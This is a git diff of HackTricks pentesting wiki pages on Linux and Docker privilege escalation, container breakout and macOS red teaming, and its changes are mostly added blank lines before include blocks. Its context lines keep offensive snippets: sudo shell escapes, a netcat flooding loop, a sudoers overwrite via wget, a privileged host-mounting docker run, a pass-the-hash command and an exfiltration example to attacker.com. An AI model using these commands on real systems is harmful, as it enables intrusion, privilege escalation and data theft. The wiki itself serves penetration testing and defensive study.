||||
Read the following page for more wildcard exploitation tricks:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
wildcards-spare-tricks.md
|
||||
{{#endref}}
|
||||
@ -563,6 +565,7 @@ socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of
|
||||
|
||||
**Exploitation example:**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
socket-command-injection.md
|
||||
{{#endref}}
|
||||
@ -632,6 +635,7 @@ Note that if you have write permissions over the docker socket because you are *
|
||||
|
||||
Check **more ways to break out from docker or abuse it to escalate privileges** in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
docker-security/
|
||||
{{#endref}}
|
||||
@ -640,6 +644,7 @@ docker-security/
|
||||
|
||||
If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
containerd-ctr-privilege-escalation.md
|
||||
{{#endref}}
|
||||
@ -648,6 +653,7 @@ containerd-ctr-privilege-escalation.md
|
||||
|
||||
If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
runc-privilege-escalation.md
|
||||
{{#endref}}
|
||||
@ -675,6 +681,7 @@ Policies without a specified user or group apply universally, while "default" co
|
||||
|
||||
**Learn how to enumerate and exploit a D-Bus communication here:**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
d-bus-enumeration-and-command-injection-privilege-escalation.md
|
||||
{{#endref}}
|
||||
@ -762,6 +769,7 @@ Some Linux versions were affected by a bug that allows users with **UID > INT_MA
|
||||
|
||||
Check if you are a **member of some group** that could grant you root privileges:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
interesting-groups-linux-pe/
|
||||
{{#endref}}
|
||||
@ -1049,10 +1057,12 @@ The project collects legitimate functions of Unix binaries that can be abused to
|
||||
> strace -o /dev/null /bin/sh\
|
||||
> sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://gtfobins.github.io/
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://gtfoargs.github.io/
|
||||
{{#endref}}
|
||||
@ -1175,6 +1185,7 @@ That means that the configuration files from `/etc/ld.so.conf.d/*.conf` will be
|
||||
If for some reason **a user has write permissions** on any of the paths indicated: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, any file inside `/etc/ld.so.conf.d/` or any folder within the config file inside `/etc/ld.so.conf.d/*.conf` he may be able to escalate privileges.\
|
||||
Take a look at **how to exploit this misconfiguration** in the following page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ld.so.conf-example.md
|
||||
{{#endref}}
|
||||
@ -1223,6 +1234,7 @@ int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp
|
||||
Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation.\
|
||||
Read the following page to **learn more about capabilities and how to abuse them**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
linux-capabilities.md
|
||||
{{#endref}}
|
||||
@ -1353,6 +1365,7 @@ The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding wit
|
||||
|
||||
If you find that Forward Agent is configured in an environment read the following page as **you may be able to abuse it to escalate privileges**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ssh-forward-agent-exploitation.md
|
||||
{{#endref}}
|
||||
@ -1598,18 +1611,21 @@ On the other hand, `/etc/init` is associated with **Upstart**, a newer **service
|
||||
|
||||
### NFS Privilege escalation
|
||||
|
||||
|
||||
{{#ref}}
|
||||
nfs-no_root_squash-misconfiguration-pe.md
|
||||
{{#endref}}
|
||||
|
||||
### Escaping from restricted Shells
|
||||
|
||||
|
||||
{{#ref}}
|
||||
escaping-from-limited-bash.md
|
||||
{{#endref}}
|
||||
|
||||
### Cisco - vmanage
|
||||
|
||||
|
||||
{{#ref}}
|
||||
cisco-vmanage.md
|
||||
{{#endref}}
|
||||
@ -1663,9 +1679,9 @@ cisco-vmanage.md
|
||||
|
||||
Android rooting frameworks commonly hook a syscall to expose privileged kernel functionality to a userspace manager. Weak manager authentication (e.g., signature checks based on FD-order or poor password schemes) can enable a local app to impersonate the manager and escalate to root on already-rooted devices. Learn more and exploitation details here:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
|
||||
{{#endref}}
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
|
||||
Go to the following link to learn **what is containerd** and `ctr`:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../network-services-pentesting/2375-pentesting-docker.md
|
||||
{{#endref}}
|
||||
@ -45,6 +46,7 @@ You can run a privileged container as:
|
||||
|
||||
Then you can use some of the techniques mentioned in the following page to **escape from it abusing privileged capabilities**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
docker-security/
|
||||
{{#endref}}
|
||||
@ -52,4 +54,3 @@ docker-security/
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -155,6 +155,7 @@ Docker makes use of the following Linux kernel Namespaces to achieve Container i
|
||||
|
||||
For **more information about the namespaces** check the following page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
namespaces/
|
||||
{{#endref}}
|
||||
@ -178,6 +179,7 @@ ls -l /proc/<PID>/ns #Get the Group and the namespaces (some may be uniq to the
|
||||
|
||||
For more information check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
cgroups.md
|
||||
{{#endref}}
|
||||
@ -188,6 +190,7 @@ Capabilities allow **finer control for the capabilities that can be allowed** fo
|
||||
|
||||
When a docker container is run, the **process drops sensitive capabilities that the proccess could use to escape from the isolation**. This try to assure that the proccess won't be able to perform sensitive actions and escape:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../linux-capabilities.md
|
||||
{{#endref}}
|
||||
@ -196,6 +199,7 @@ When a docker container is run, the **process drops sensitive capabilities that
|
||||
|
||||
This is a security feature that allows Docker to **limit the syscalls** that can be used inside the container:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
seccomp.md
|
||||
{{#endref}}
|
||||
@ -204,6 +208,7 @@ seccomp.md
|
||||
|
||||
**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**.:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
apparmor.md
|
||||
{{#endref}}
|
||||
@ -218,6 +223,7 @@ apparmor.md
|
||||
|
||||
This mechanism ensures that even if a process within a container is compromised, it's confined to interacting only with objects that have the corresponding labels, significantly limiting the potential damage from such compromises.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../selinux.md
|
||||
{{#endref}}
|
||||
@ -231,6 +237,7 @@ In Docker, an authorization plugin plays a crucial role in security by deciding
|
||||
|
||||
These contexts help ensure that only legitimate requests from authenticated users are processed, enhancing the security of Docker operations.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
authz-and-authn-docker-access-authorization-plugin.md
|
||||
{{#endref}}
|
||||
@ -261,6 +268,7 @@ nc -lvp 4444 >/dev/null & while true; do cat /dev/urandom | nc <target IP> 4444;
|
||||
|
||||
In the following page you can learn **what does the `--privileged` flag imply**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
docker-privileged.md
|
||||
{{#endref}}
|
||||
@ -341,6 +349,7 @@ In Kubernetes environments, secrets are natively supported and can be further ma
|
||||
|
||||
**gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://github.com/google/gvisor
|
||||
{{#endref}}
|
||||
@ -349,6 +358,7 @@ https://github.com/google/gvisor
|
||||
|
||||
**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://katacontainers.io/
|
||||
{{#endref}}
|
||||
@ -374,6 +384,7 @@ https://katacontainers.io/
|
||||
|
||||
If you are **inside a docker container** or you have access to a user in the **docker group**, you could try to **escape and escalate privileges**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
docker-breakout-privilege-escalation/
|
||||
{{#endref}}
|
||||
@ -382,6 +393,7 @@ docker-breakout-privilege-escalation/
|
||||
|
||||
If you have access to the docker socket or have access to a user in the **docker group but your actions are being limited by a docker auth plugin**, check if you can **bypass it:**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
authz-and-authn-docker-access-authorization-plugin.md
|
||||
{{#endref}}
|
||||
@ -408,4 +420,3 @@ authz-and-authn-docker-access-authorization-plugin.md
|
||||
- [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -64,6 +64,7 @@ capsh --print
|
||||
|
||||
In the following page you can **learn more about linux capabilities** and how to abuse them to escape/escalate privileges:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../linux-capabilities.md
|
||||
{{#endref}}
|
||||
@ -84,6 +85,7 @@ A privileged container can be created with the flag `--privileged` or disabling
|
||||
|
||||
The `--privileged` flag significantly lowers container security, offering **unrestricted device access** and bypassing **several protections**. For a detailed breakdown, refer to the documentation on `--privileged`'s full impacts.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../docker-privileged.md
|
||||
{{#endref}}
|
||||
@ -230,6 +232,7 @@ cat /output
|
||||
|
||||
Find an **explanation of the technique** in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
docker-release_agent-cgroups-escape.md
|
||||
{{#endref}}
|
||||
@ -238,6 +241,7 @@ docker-release_agent-cgroups-escape.md
|
||||
|
||||
In the previous exploits the **absolute path of the container inside the hosts filesystem is disclosed**. However, this isn’t always the case. In cases where you **don’t know the absolute path of the container inside the host** you can use this technique:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
release_agent-exploit-relative-paths-to-pids.md
|
||||
{{#endref}}
|
||||
@ -345,6 +349,7 @@ The abuse of these files may allow that:
|
||||
|
||||
However, you can find **other sensitive files** to check for in this page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
sensitive-mounts.md
|
||||
{{#endref}}
|
||||
@ -640,4 +645,3 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -98,6 +98,7 @@ mount | grep /proc.*tmpfs
|
||||
|
||||
Container engines launch the containers with a **limited number of capabilities** to control what goes on inside of the container by default. **Privileged** ones have **all** the **capabilities** accesible. To learn about capabilities read:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../linux-capabilities.md
|
||||
{{#endref}}
|
||||
@ -136,6 +137,7 @@ You can manipulate the capabilities available to a container without running in
|
||||
|
||||
**Seccomp** is useful to **limit** the **syscalls** a container can call. A default seccomp profile is enabled by default when running docker containers, but in privileged mode it is disabled. Learn more about Seccomp here:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
seccomp.md
|
||||
{{#endref}}
|
||||
@ -175,6 +177,7 @@ Also, note that when Docker (or other CRIs) are used in a **Kubernetes** cluster
|
||||
|
||||
**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**. When you run with the `--privileged` flag, this protection is disabled.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
apparmor.md
|
||||
{{#endref}}
|
||||
@ -188,6 +191,7 @@ apparmor.md
|
||||
|
||||
Running a container with the `--privileged` flag disables **SELinux labels**, causing it to inherit the label of the container engine, typically `unconfined`, granting full access similar to the container engine. In rootless mode, it uses `container_runtime_t`, while in root mode, `spc_t` is applied.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../selinux.md
|
||||
{{#endref}}
|
||||
@ -242,4 +246,3 @@ PID USER TIME COMMAND
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -4,42 +4,49 @@
|
||||
|
||||
### **PID namespace**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
pid-namespace.md
|
||||
{{#endref}}
|
||||
|
||||
### **Mount namespace**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
mount-namespace.md
|
||||
{{#endref}}
|
||||
|
||||
### **Network namespace**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
network-namespace.md
|
||||
{{#endref}}
|
||||
|
||||
### **IPC Namespace**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ipc-namespace.md
|
||||
{{#endref}}
|
||||
|
||||
### **UTS namespace**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
uts-namespace.md
|
||||
{{#endref}}
|
||||
|
||||
### Time Namespace
|
||||
|
||||
|
||||
{{#ref}}
|
||||
time-namespace.md
|
||||
{{#endref}}
|
||||
|
||||
### User namespace
|
||||
|
||||
|
||||
{{#ref}}
|
||||
user-namespace.md
|
||||
{{#endref}}
|
||||
@ -47,4 +54,3 @@ user-namespace.md
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -16,6 +16,7 @@ While cgroup namespaces are not a separate namespace type like the others we dis
|
||||
|
||||
For more information about CGroups check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../cgroups.md
|
||||
{{#endref}}
|
||||
@ -92,4 +93,3 @@ Also, you can only **enter in another process namespace if you are root**. And y
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -231,6 +231,7 @@ wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
|
||||
[https://gtfobins.github.io](https://gtfobins.github.io/**](https/gtfobins.github.io)\
|
||||
**It could also be interesting the page:**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../bypass-bash-restrictions/
|
||||
{{#endref}}
|
||||
@ -239,6 +240,7 @@ wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
|
||||
|
||||
Tricks about escaping from python jails in the following page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../generic-methodologies-and-resources/python/bypass-python-sandboxes/
|
||||
{{#endref}}
|
||||
@ -292,4 +294,3 @@ debug.debug()
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -235,22 +235,26 @@ docker run --rm -it --pid=host --net=host --privileged -v /:/mnt <imagename> chr
|
||||
|
||||
Finally, if you don't like any of the suggestions of before, or they aren't working for some reason (docker api firewall?) you could always try to **run a privileged container and escape from it** as explained here:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../docker-security/
|
||||
{{#endref}}
|
||||
|
||||
If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../index.html#writable-docker-socket)**.**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://github.com/KrustyHack/docker-privilege-escalation
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://fosterelli.co/privilege-escalation-via-docker.html
|
||||
{{#endref}}
|
||||
|
||||
## lxc/lxd Group
|
||||
|
||||
|
||||
{{#ref}}
|
||||
./
|
||||
{{#endref}}
|
||||
@ -266,4 +270,3 @@ Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey*
|
||||
These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -14,6 +14,7 @@ If you have access over an AD in linux (or bash in Windows) you can try [https:/
|
||||
|
||||
You can also check the following page to learn **other ways to enumerate AD from linux**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../network-services-pentesting/pentesting-ldap.md
|
||||
{{#endref}}
|
||||
@ -22,6 +23,7 @@ You can also check the following page to learn **other ways to enumerate AD from
|
||||
|
||||
FreeIPA is an open-source **alternative** to Microsoft Windows **Active Directory**, mainly for **Unix** environments. It combines a complete **LDAP directory** with an MIT **Kerberos** Key Distribution Center for management akin to Active Directory. Utilizing the Dogtag **Certificate System** for CA & RA certificate management, it supports **multi-factor** authentication, including smartcards. SSSD is integrated for Unix authentication processes. Learn more about it in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../freeipa-pentesting.md
|
||||
{{#endref}}
|
||||
@ -32,6 +34,7 @@ FreeIPA is an open-source **alternative** to Microsoft Windows **Active Director
|
||||
|
||||
In this page you are going to find different places were you could **find kerberos tickets inside a linux host**, in the following page you can learn how to transform this CCache tickets formats to Kirbi (the format you need to use in Windows) and also how to perform a PTT attack:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../windows-hardening/active-directory-methodology/pass-the-ticket.md
|
||||
{{#endref}}
|
||||
@ -126,4 +129,3 @@ crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDO
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -1413,6 +1413,7 @@ kill -s SIGUSR1 <nodejs-ps>
|
||||
# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
|
||||
```
|
||||
|
||||
|
||||
{{#ref}}
|
||||
electron-cef-chromium-debugger-abuse.md
|
||||
{{#endref}}
|
||||
@ -1676,4 +1677,3 @@ In summary, `CAP_SETPCAP` allows a process to modify the capability sets of othe
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -15,6 +15,7 @@ In the **/etc/exports** file, if you find some directory that is configured as *
|
||||
|
||||
For more information about **NFS** check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../network-services-pentesting/nfs-service-pentesting.md
|
||||
{{#endref}}
|
||||
@ -143,4 +144,3 @@ drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
|
||||
If you want to learn more about **runc** check the following page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../network-services-pentesting/2375-pentesting-docker.md
|
||||
{{#endref}}
|
||||
@ -44,4 +45,3 @@ runc run demo
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -12,6 +12,7 @@ If you manage to **compromise admin credentials** to access the management platf
|
||||
|
||||
For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-mdm/
|
||||
{{#endref}}
|
||||
@ -99,6 +100,7 @@ The script [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-T
|
||||
|
||||
And also about **MacOS** "special" **network** **protocols**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../macos-security-and-privilege-escalation/macos-protocols.md
|
||||
{{#endref}}
|
||||
@ -107,14 +109,17 @@ And also about **MacOS** "special" **network** **protocols**:
|
||||
|
||||
In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../network-services-pentesting/pentesting-ldap.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../windows-hardening/active-directory-methodology/
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../network-services-pentesting/pentesting-kerberos-88/
|
||||
{{#endref}}
|
||||
@ -223,6 +228,7 @@ mount -t smbfs //server/folder /local/mount/point
|
||||
|
||||
The Keychain highly probably contains sensitive information that if accessed without generating a prompt could help to move forward a red team exercise:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-keychain.md
|
||||
{{#endref}}
|
||||
@ -251,4 +257,3 @@ When a file is downloaded in Safari, if its a "safe" file, it will be **automati
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -77,6 +77,7 @@ It's crucial to note that the ease of enrollment provided by DEP, while benefici
|
||||
|
||||
Apple devices manufactured after 2010 generally have **12-character alphanumeric** serial numbers, with the **first three digits representing the manufacturing location**, the following **two** indicating the **year** and **week** of manufacture, the next **three** digits providing a **unique** **identifier**, and the **last** **four** digits representing the **model number**.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-serial-number.md
|
||||
{{#endref}}
|
||||
@ -196,6 +197,7 @@ Typically, **activation profile** provided by an MDM vendor will **include the f
|
||||
As previously commented, in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
|
||||
Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
enrolling-devices-in-other-organisations.md
|
||||
{{#endref}}
|
||||
@ -203,4 +205,3 @@ enrolling-devices-in-other-organisations.md
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -8,30 +8,35 @@ If you are not familiar with macOS, you should start learning the basics of macO
|
||||
|
||||
- Special macOS **files & permissions:**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-files-folders-and-binaries/
|
||||
{{#endref}}
|
||||
|
||||
- Common macOS **users**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-users.md
|
||||
{{#endref}}
|
||||
|
||||
- **AppleFS**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-applefs.md
|
||||
{{#endref}}
|
||||
|
||||
- The **architecture** of the k**ernel**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
mac-os-architecture/
|
||||
{{#endref}}
|
||||
|
||||
- Common macOS n**etwork services & protocols**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-protocols.md
|
||||
{{#endref}}
|
||||
@ -43,18 +48,21 @@ macos-protocols.md
|
||||
|
||||
In companies **macOS** systems are highly probably going to be **managed with a MDM**. Therefore, from the perspective of an attacker is interesting to know **how that works**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../macos-red-teaming/macos-mdm/
|
||||
{{#endref}}
|
||||
|
||||
### MacOS - Inspecting, Debugging and Fuzzing
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-apps-inspecting-debugging-and-fuzzing/
|
||||
{{#endref}}
|
||||
|
||||
## MacOS Security Protections
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-security-protections/
|
||||
{{#endref}}
|
||||
@ -75,6 +83,7 @@ Being able to **create a file** that is going to be **used by root**, allows a u
|
||||
|
||||
For this kind of vulnerabilities don't forget to **check vulnerable `.pkg` installers**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-files-folders-and-binaries/macos-installers-abuse.md
|
||||
{{#endref}}
|
||||
@ -83,6 +92,7 @@ macos-files-folders-and-binaries/macos-installers-abuse.md
|
||||
|
||||
Weird apps registered by file extensions could be abused and different applications can be register to open specific protocols
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-file-extension-apps.md
|
||||
{{#endref}}
|
||||
@ -101,6 +111,7 @@ Follow these links to find different was to [**escalate privileges in TCC**](mac
|
||||
|
||||
Of course from a red teams perspective you should be also interested in escalating to root. Check the following post for some hints:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-privilege-escalation.md
|
||||
{{#endref}}
|
||||
@ -120,4 +131,3 @@ macos-privilege-escalation.md
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -35,12 +35,14 @@ Moreover, **Mach and BSD each maintain different security models**: **Mach's** s
|
||||
|
||||
The I/O Kit is an open-source, object-oriented **device-driver framework** in the XNU kernel, handles **dynamically loaded device drivers**. It allows modular code to be added to the kernel on-the-fly, supporting diverse hardware.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-iokit.md
|
||||
{{#endref}}
|
||||
|
||||
### IPC - Inter Process Communication
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../macos-proces-abuse/macos-ipc-inter-process-communication/
|
||||
{{#endref}}
|
||||
@ -51,6 +53,7 @@ macOS is **super restrictive to load Kernel Extensions** (.kext) because of the
|
||||
|
||||
In the following page you can also see how to recover the `.kext` that macOS loads inside its **kernelcache**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-kernel-extensions.md
|
||||
{{#endref}}
|
||||
@ -59,6 +62,7 @@ macos-kernel-extensions.md
|
||||
|
||||
Instead of using Kernel Extensions macOS created the System Extensions, which offers in user level APIs to interact with the kernel. This way, developers can avoid to use kernel extensions.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-system-extensions.md
|
||||
{{#endref}}
|
||||
@ -71,4 +75,3 @@ macos-system-extensions.md
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -250,6 +250,7 @@ int main() {
|
||||
|
||||
You can grab a shellcode from:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
|
||||
{{#endref}}
|
||||
@ -524,6 +525,7 @@ Therefore, to **improve the thread** it should call **`pthread_create_from_mach_
|
||||
|
||||
You can find **example dylibs** in (for example the one that generates a log and then you can listen to it):
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../macos-dyld-hijacking-and-dyld_insert_libraries.md
|
||||
{{#endref}}
|
||||
@ -814,6 +816,7 @@ gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector
|
||||
|
||||
In this technique a thread of the process is hijacked:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
|
||||
{{#endref}}
|
||||
@ -826,6 +829,7 @@ XPC, which stands for XNU (the kernel used by macOS) inter-Process Communication
|
||||
|
||||
For more information about how this **communication work** on how it **could be vulnerable** check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/
|
||||
{{#endref}}
|
||||
@ -836,6 +840,7 @@ MIG was created to **simplify the process of Mach IPC** code creation. It basica
|
||||
|
||||
For more info check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
|
||||
{{#endref}}
|
||||
@ -851,4 +856,3 @@ For more info check:
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -138,6 +138,7 @@ The params this function expects are:
|
||||
|
||||
See how to **get this info easily with `lldb` in ARM64** in this page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
arm64-basic-assembly.md
|
||||
{{#endref}}
|
||||
@ -557,6 +558,7 @@ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist
|
||||
|
||||
**Checkout the following page** to find out how you can find which app is responsible of **handling the specified scheme or protocol:**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../macos-file-extension-apps.md
|
||||
{{#endref}}
|
||||
@ -635,4 +637,3 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -75,6 +75,7 @@ open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
|
||||
|
||||
If you can **inject code into a process** that is allowed to connect to any server you could bypass the firewall protections:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-proces-abuse/
|
||||
{{#endref}}
|
||||
|
@ -35,12 +35,14 @@
|
||||
|
||||
MacOS stores information such as passwords in several places:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-sensitive-locations.md
|
||||
{{#endref}}
|
||||
|
||||
### Vulnerable pkg installers
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-installers-abuse.md
|
||||
{{#endref}}
|
||||
@ -69,6 +71,7 @@ macos-installers-abuse.md
|
||||
|
||||
A bundle is a **directory** which **looks like an object in Finder** (a Bundle example are `*.app` files).
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-bundles.md
|
||||
{{#endref}}
|
||||
@ -235,6 +238,7 @@ The tool afscexpand can be used to force decompress a dile.
|
||||
|
||||
Mac OS binaries usually are compiled as **universal binaries**. A **universal binary** can **support multiple architectures in the same file**.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
universal-binaries-and-mach-o-format.md
|
||||
{{#endref}}
|
||||
@ -243,6 +247,7 @@ universal-binaries-and-mach-o-format.md
|
||||
|
||||
## macOS memory dumping
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-memory-dumping.md
|
||||
{{#endref}}
|
||||
@ -270,4 +275,3 @@ The directory `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
|
||||
If you came here looking for TCC privilege escalation go to:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-security-protections/macos-tcc/
|
||||
